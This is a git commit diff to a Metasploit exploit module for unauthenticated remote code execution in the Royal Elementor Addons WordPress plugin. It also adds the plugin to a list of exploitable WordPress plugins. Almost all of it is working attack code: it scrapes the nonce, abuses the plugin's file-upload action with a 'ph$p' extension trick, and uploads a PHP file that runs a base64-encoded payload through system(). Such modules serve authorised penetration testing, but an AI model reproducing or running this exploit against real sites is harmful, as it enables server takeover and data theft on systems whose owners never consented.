Add suggested changes

2023-11-23 18:22:36 +01:00 · 2023-11-23 18:22:36 +01:00 · 65ea1188e2
parent 31daaf58fe
commit 65ea1188e2
2 changed files with 14 additions and 15 deletions
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@ -59,3 +59,4 @@ bookingpress
 paid-memberships-pro
 woocommerce-payments
 file-manager-advanced-shortcode
+royal-elementor-addons
--- a/modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb
+++ b/modules/exploits/multi/http/wp_royal_elementor_addons_rce.rb
@ -32,6 +32,10 @@ class MetasploitModule < Msf::Exploit::Remote
        'Targets' => [['Automatic', {}]],
        'DisclosureDate' => '2023-11-23',
        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
+        },
        'Privileged' => false,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
@ -40,12 +44,6 @@ class MetasploitModule < Msf::Exploit::Remote
        }
      )
  )
-
-    register_options([
-      OptString.new('TARGETURI', [true, 'The base path to the WordPress application', '/']),
-      OptBool.new('SSL', [true, 'Use SSL/TLS connection', true]),
-      Opt::RPORT(443)
-    ])
  end

  def check
@ -56,13 +54,13 @@ class MetasploitModule < Msf::Exploit::Remote

    check_code = check_plugin_version_from_readme('royal-elementor-addons', '1.3.79')

-    if check_code.code == 'appears'
-      plugin_version = check_code.details[:version]
-      print_good("Detected Royal Elementor Addons version: #{plugin_version}")
-      return CheckCode::Appears
+    if check_code.code != 'appears'
+      return CheckCode::Safe
    end

-    return CheckCode::Safe
+    plugin_version = check_code.details[:version]
+    print_good("Detected Royal Elementor Addons version: #{plugin_version}")
+    return CheckCode::Appears
  end

  def exploit
@ -74,15 +72,15 @@ class MetasploitModule < Msf::Exploit::Remote

    data = {
      'action' => 'wpr_addons_upload_file',
-      'max_file_size' => 0,
+      'max_file_size' => rand(10001),
      'allowed_file_types' => 'ph$p',
      'triggering_event' => 'click',
      'wpr_addons_nonce' => nonce
    }

    file_content = '<?php '
-    file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system('#{payload.encoded}');")
-    file_content << ' ?>'
+    file_content << (payload_instance.arch.include?(ARCH_PHP) ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));")
+    file_content << '?>'

    file_name = "#{Rex::Text.rand_text_alphanumeric(8)}.ph$p"

@ -128,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
    fail_with(Failure::Unreachable, 'No response received from the target') if res.nil?
    fail_with(Failure::UnexpectedReply, "Unexpected HTTP response code from the target: #{res.code}") if res.code != 200

-    match = res.body.match(/var\s+WprConfig\s*=\s*({.*?});/)
+    match = res.body.match(/var\s+WprConfig\s*=\s*({.+?});/)
    fail_with(Failure::NoTarget, 'Nonce not found in the response.') if match.nil? || match[1].nil?

    nonce = JSON.parse(match[1])['nonce']